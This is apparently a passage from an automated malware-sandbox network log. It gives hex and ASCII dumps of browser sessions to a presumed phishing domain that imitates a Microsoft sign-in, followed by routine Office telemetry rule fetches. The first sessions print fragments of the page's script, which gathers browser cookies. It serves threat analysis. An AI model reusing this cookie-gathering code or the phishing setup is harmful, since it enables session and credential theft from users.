                                                  Data Ascii: f(s[S.a.R(n)]){var o=n.firstChild;if(o)do{if(1===o.nodeType){var i,a=null;if(i=o.firstChild)do{if(a)a.push(i);else if(e(i)){var u=r(i,!0);u?i=u:a=[i]}else t(i)&&(a=[i])}while(i=i.nextSibling);if(i=a)for(a=o.nextSibling,u=0;u<i.length;u++)a?n.insertBefore(
                                                  2024-11-27 17:09:56 UTC16384INData Raw: 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 6f 2c 69 2c 61 29 7b 76 61 72 20 73 2c 75 2c 63 2c 6c 2c 64 2c 66 3d 7b 7d 3b 69 66 28 74 29 7b 69 3d 6f 2e 67 65 74 28 22 61 73 22 29 3b 76 61 72 20 70 3d 6f 2e 67 65 74 28 22 6e 6f 43 68 69 6c 64 43 6f 6e 74 65 78 74 22 29 3b 66 3d 7b 61 73 3a 69 2c 6e 6f 43 68 69 6c 64 43 6f 6e 74 65 78 74 3a 70 2c 65 78 70 6f 72 74 44 65 70 65 6e 64 65 6e 63 69 65 73 3a 64 3d 21 28 69 26 26 70 29 7d 7d 72 65 74 75 72 6e 20 6c 3d 28 63 3d 22 72 65 6e 64 65 72 22 3d 3d 6f 2e 67 65 74 28 22 63 6f 6d 70 6c 65 74 65 4f 6e 22 29 29 7c 7c 6f 2e 68 61 73 28 53 2e 69 2e 70 61 29 2c 53 2e 6f 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 2c 69 3d 53 2e 61 2e 66 28 72 28 29 29 2c 70 3d 21 6e 21 3d 21 69 2c 68 3d 21 75 3b 28 64 7c 7c
                                                  Data Ascii: function(e,r,o,i,a){var s,u,c,l,d,f={};if(t){i=o.get("as");var p=o.get("noChildContext");f={as:i,noChildContext:p,exportDependencies:d=!(i&&p)}}return l=(c="render"==o.get("completeOn"))||o.has(S.i.pa),S.o((function(){var o,i=S.a.f(r()),p=!n!=!i,h=!u;(d||
                                                  2024-11-27 17:09:56 UTC16384INData Raw: 45 3c 6f 2e 6c 65 6e 67 74 68 3b 29 64 28 43 2b 2b 29 3b 79 2e 5f 63 6f 75 6e 74 57 61 69 74 69 6e 67 46 6f 72 52 65 6d 6f 76 65 3d 78 7d 53 2e 61 2e 67 2e 73 65 74 28 72 2c 74 2c 79 29 2c 66 28 73 2e 62 65 66 6f 72 65 4d 6f 76 65 2c 41 29 2c 53 2e 61 2e 44 28 77 2c 73 2e 62 65 66 6f 72 65 52 65 6d 6f 76 65 3f 53 2e 6f 61 3a 53 2e 72 65 6d 6f 76 65 4e 6f 64 65 29 3b 74 72 79 7b 6d 3d 72 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 7d 63 61 74 63 68 28 49 29 7b 7d 69 66 28 50 2e 6c 65 6e 67 74 68 29 66 6f 72 28 3b 28 4f 3d 50 2e 73 68 69 66 74 28 29 29 21 3d 61 3b 29 7b 66 6f 72 28 70 3d 79 5b 4f 5d 2c 68 3d 61 3b 4f 3b 29 69 66 28 28 67 3d 79 5b 2d 2d 4f 5d 2e 59 29 26 26 67 2e 6c 65 6e 67 74 68 29 7b 68 3d 67 5b 67
                                                  Data Ascii: E<o.length;)d(C++);y._countWaitingForRemove=x}S.a.g.set(r,t,y),f(s.beforeMove,A),S.a.D(w,s.beforeRemove?S.oa:S.removeNode);try{m=r.ownerDocument.activeElement}catch(I){}if(P.length)for(;(O=P.shift())!=a;){for(p=y[O],h=a;O;)if((g=y[--O].Y)&&g.length){h=g[g
                                                  2024-11-27 17:09:56 UTC12649INData Raw: 3d 3d 61 26 26 28 65 3d 6e 65 77 20 75 28 7b 6c 6f 67 4d 65 73 73 61 67 65 3a 62 2c 6c 6f 67 44 61 74 61 50 6f 69 6e 74 3a 79 7d 2c 6e 2e 6e 6f 6e 6f 6e 63 65 2c 22 64 6f 63 75 6d 65 72 67 65 72 2e 61 66 75 61 2e 63 6f 6d 2e 62 72 22 2c 6f 2c 69 29 2e 67 65 74 43 6f 6f 6b 69 65 73 41 73 79 6e 63 28 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 7c 7c 21 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 73 2e 72 65 6a 65 63 74 28 6e 65 77 20 75 2e 45 72 72 6f 72 28 22 50 61 67 65 45 78 63 65 70 74 69 6f 6e 22 2c 22 45 78 74 65 6e 73 69 6f 6e 20 72 65 74 75 72 6e 65 64 20 6e 6f 20 63 6f 6f 6b 69 65 73 22 29 29 3b 66 6f 72 28 76 61 72 20 74 3d 30 2c 6e 3d 65 2e 6c 65 6e 67 74 68 3b 74 3c 6e 3b 2b 2b 74 29 7b 76 61 72 20 72 3d 65 5b
                                                  Data Ascii: ==a&&(e=new u({logMessage:b,logDataPoint:y},n.nononce,"documerger.afua.com.br",o,i).getCookiesAsync().then((function(e){if(!e||!e.length)return s.reject(new u.Error("PageException","Extension returned no cookies"));for(var t=0,n=e.length;t<n;++t){var r=e[


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  55192.168.2.64977113.107.246.634435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:55 UTC641OUTPOST /report/ESTS-UX-All HTTP/1.1
                                                  Host: csp.microsoft.com
                                                  Connection: keep-alive
                                                  Content-Length: 977
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-platform: "Windows"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Content-Type: application/csp-report
                                                  Accept: */*
                                                  Origin: https://documerger.afua.com.br
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: report
                                                  Referer: https://documerger.afua.com.br/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-11-27 17:09:55 UTC977OUTData Raw: 7b 22 63 73 70 2d 72 65 70 6f 72 74 22 3a 7b 22 64 6f 63 75 6d 65 6e 74 2d 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 75 6d 65 72 67 65 72 2e 61 66 75 61 2e 63 6f 6d 2e 62 72 2f 3f 61 75 74 68 3d 32 26 71 72 63 3d 75 39 73 37 6f 6f 25 34 30 76 6c 78 77 72 78 61 2e 6f 72 67 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 61 64 72 69 61 6e 6f 63 61 72 72 65 69 72 61 2e 63 6f 6d 2f 22 2c 22 76 69 6f 6c 61 74 65 64 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 65 66 66 65 63 74 69 76 65 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 6f 72 69 67 69 6e 61 6c 2d 70 6f 6c 69 63 79 22 3a 22 6f 62 6a 65 63 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20
                                                  Data Ascii: {"csp-report":{"document-uri":"https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org","referrer":"https://adrianocarreira.com/","violated-directive":"script-src-elem","effective-directive":"script-src-elem","original-policy":"object-src 'none';
                                                  2024-11-27 17:09:59 UTC349INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:59 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  Request-Context: appId=cid-v1:5c791ad2-9c50-4271-a8a5-5c74d929f3ed
                                                  x-azure-ref: 20241127T170955Z-174f7845968cdxdrhC1EWRg0en0000000x3g00000000p953
                                                  X-Cache: CONFIG_NOCACHE
                                                  2024-11-27 17:09:59 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                  Data Ascii: 2ok
                                                  2024-11-27 17:09:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  56192.168.2.64977013.107.246.634435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:55 UTC642OUTPOST /report/ESTS-UX-All HTTP/1.1
                                                  Host: csp.microsoft.com
                                                  Connection: keep-alive
                                                  Content-Length: 1091
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-platform: "Windows"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Content-Type: application/csp-report
                                                  Accept: */*
                                                  Origin: https://documerger.afua.com.br
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: report
                                                  Referer: https://documerger.afua.com.br/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-11-27 17:09:55 UTC1091OUTData Raw: 7b 22 63 73 70 2d 72 65 70 6f 72 74 22 3a 7b 22 64 6f 63 75 6d 65 6e 74 2d 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 75 6d 65 72 67 65 72 2e 61 66 75 61 2e 63 6f 6d 2e 62 72 2f 3f 61 75 74 68 3d 32 26 71 72 63 3d 75 39 73 37 6f 6f 25 34 30 76 6c 78 77 72 78 61 2e 6f 72 67 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 61 64 72 69 61 6e 6f 63 61 72 72 65 69 72 61 2e 63 6f 6d 2f 22 2c 22 76 69 6f 6c 61 74 65 64 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 65 66 66 65 63 74 69 76 65 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 6f 72 69 67 69 6e 61 6c 2d 70 6f 6c 69 63 79 22 3a 22 6f 62 6a 65 63 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20
                                                  Data Ascii: {"csp-report":{"document-uri":"https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org","referrer":"https://adrianocarreira.com/","violated-directive":"script-src-elem","effective-directive":"script-src-elem","original-policy":"object-src 'none';
                                                  2024-11-27 17:09:56 UTC349INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:56 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  Request-Context: appId=cid-v1:5c791ad2-9c50-4271-a8a5-5c74d929f3ed
                                                  x-azure-ref: 20241127T170955Z-174f7845968nxc96hC1EWRspw80000000x1g00000000490e
                                                  X-Cache: CONFIG_NOCACHE
                                                  2024-11-27 17:09:56 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                  Data Ascii: 2ok
                                                  2024-11-27 17:09:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  57192.168.2.64977313.107.246.634435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:55 UTC642OUTPOST /report/ESTS-UX-All HTTP/1.1
                                                  Host: csp.microsoft.com
                                                  Connection: keep-alive
                                                  Content-Length: 1090
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-platform: "Windows"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Content-Type: application/csp-report
                                                  Accept: */*
                                                  Origin: https://documerger.afua.com.br
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: report
                                                  Referer: https://documerger.afua.com.br/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-11-27 17:09:55 UTC1090OUTData Raw: 7b 22 63 73 70 2d 72 65 70 6f 72 74 22 3a 7b 22 64 6f 63 75 6d 65 6e 74 2d 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 75 6d 65 72 67 65 72 2e 61 66 75 61 2e 63 6f 6d 2e 62 72 2f 3f 61 75 74 68 3d 32 26 71 72 63 3d 75 39 73 37 6f 6f 25 34 30 76 6c 78 77 72 78 61 2e 6f 72 67 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 61 64 72 69 61 6e 6f 63 61 72 72 65 69 72 61 2e 63 6f 6d 2f 22 2c 22 76 69 6f 6c 61 74 65 64 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 65 66 66 65 63 74 69 76 65 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 6f 72 69 67 69 6e 61 6c 2d 70 6f 6c 69 63 79 22 3a 22 6f 62 6a 65 63 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20
                                                  Data Ascii: {"csp-report":{"document-uri":"https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org","referrer":"https://adrianocarreira.com/","violated-directive":"script-src-elem","effective-directive":"script-src-elem","original-policy":"object-src 'none';
                                                  2024-11-27 17:09:58 UTC349INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:58 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  Request-Context: appId=cid-v1:5c791ad2-9c50-4271-a8a5-5c74d929f3ed
                                                  x-azure-ref: 20241127T170955Z-174f7845968px8v7hC1EWR08ng0000000xhg0000000052d4
                                                  X-Cache: CONFIG_NOCACHE
                                                  2024-11-27 17:09:58 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                  Data Ascii: 2ok
                                                  2024-11-27 17:09:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  58192.168.2.64977213.107.246.634435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:55 UTC642OUTPOST /report/ESTS-UX-All HTTP/1.1
                                                  Host: csp.microsoft.com
                                                  Connection: keep-alive
                                                  Content-Length: 1090
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-platform: "Windows"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Content-Type: application/csp-report
                                                  Accept: */*
                                                  Origin: https://documerger.afua.com.br
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: report
                                                  Referer: https://documerger.afua.com.br/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-11-27 17:09:55 UTC1090OUTData Raw: 7b 22 63 73 70 2d 72 65 70 6f 72 74 22 3a 7b 22 64 6f 63 75 6d 65 6e 74 2d 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 75 6d 65 72 67 65 72 2e 61 66 75 61 2e 63 6f 6d 2e 62 72 2f 3f 61 75 74 68 3d 32 26 71 72 63 3d 75 39 73 37 6f 6f 25 34 30 76 6c 78 77 72 78 61 2e 6f 72 67 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 61 64 72 69 61 6e 6f 63 61 72 72 65 69 72 61 2e 63 6f 6d 2f 22 2c 22 76 69 6f 6c 61 74 65 64 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 65 66 66 65 63 74 69 76 65 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 6f 72 69 67 69 6e 61 6c 2d 70 6f 6c 69 63 79 22 3a 22 6f 62 6a 65 63 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20
                                                  Data Ascii: {"csp-report":{"document-uri":"https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org","referrer":"https://adrianocarreira.com/","violated-directive":"script-src-elem","effective-directive":"script-src-elem","original-policy":"object-src 'none';
                                                  2024-11-27 17:09:58 UTC349INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:57 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  Request-Context: appId=cid-v1:5c791ad2-9c50-4271-a8a5-5c74d929f3ed
                                                  x-azure-ref: 20241127T170955Z-174f7845968n2hr8hC1EWR9cag0000000wwg000000009ueh
                                                  X-Cache: CONFIG_NOCACHE
                                                  2024-11-27 17:09:58 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                  Data Ascii: 2ok
                                                  2024-11-27 17:09:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  59192.168.2.64977413.107.246.634435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:56 UTC642OUTPOST /report/ESTS-UX-All HTTP/1.1
                                                  Host: csp.microsoft.com
                                                  Connection: keep-alive
                                                  Content-Length: 1065
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-platform: "Windows"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Content-Type: application/csp-report
                                                  Accept: */*
                                                  Origin: https://documerger.afua.com.br
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: report
                                                  Referer: https://documerger.afua.com.br/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-11-27 17:09:56 UTC1065OUTData Raw: 7b 22 63 73 70 2d 72 65 70 6f 72 74 22 3a 7b 22 64 6f 63 75 6d 65 6e 74 2d 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 75 6d 65 72 67 65 72 2e 61 66 75 61 2e 63 6f 6d 2e 62 72 2f 3f 61 75 74 68 3d 32 26 71 72 63 3d 75 39 73 37 6f 6f 25 34 30 76 6c 78 77 72 78 61 2e 6f 72 67 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 61 64 72 69 61 6e 6f 63 61 72 72 65 69 72 61 2e 63 6f 6d 2f 22 2c 22 76 69 6f 6c 61 74 65 64 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 65 66 66 65 63 74 69 76 65 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 6f 72 69 67 69 6e 61 6c 2d 70 6f 6c 69 63 79 22 3a 22 6f 62 6a 65 63 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20
                                                  Data Ascii: {"csp-report":{"document-uri":"https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org","referrer":"https://adrianocarreira.com/","violated-directive":"script-src-elem","effective-directive":"script-src-elem","original-policy":"object-src 'none';
                                                  2024-11-27 17:09:58 UTC349INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:58 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  Request-Context: appId=cid-v1:5c791ad2-9c50-4271-a8a5-5c74d929f3ed
                                                  x-azure-ref: 20241127T170956Z-174f78459688l8rvhC1EWRtzr000000009rg00000000q0e8
                                                  X-Cache: CONFIG_NOCACHE
                                                  2024-11-27 17:09:58 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                  Data Ascii: 2ok
                                                  2024-11-27 17:09:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  60192.168.2.64977513.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:56 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:56 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:56 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 479
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                  ETag: "0x8DC582B989EE75B"
                                                  x-ms-request-id: 59a03737-a01e-00ab-1891-3f9106000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170956Z-174f7845968n2hr8hC1EWR9cag0000000wz0000000000zab
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:56 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  61192.168.2.64977613.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:56 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:56 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:56 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 415
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                  ETag: "0x8DC582BA80D96A1"
                                                  x-ms-request-id: 261fcd2e-101e-005a-5345-40882b000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170956Z-174f7845968n2hr8hC1EWR9cag0000000wz0000000000zad
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:56 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  62192.168.2.64977713.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:56 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:57 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:56 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 471
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                  ETag: "0x8DC582B97E6FCDD"
                                                  x-ms-request-id: dcf51672-d01e-005a-5c91-3f7fd9000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170956Z-174f7845968nxc96hC1EWRspw80000000wvg00000000r4mx
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:57 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  63192.168.2.64977813.107.246.63443
                                                  TimestampBytes transferredDirectionData
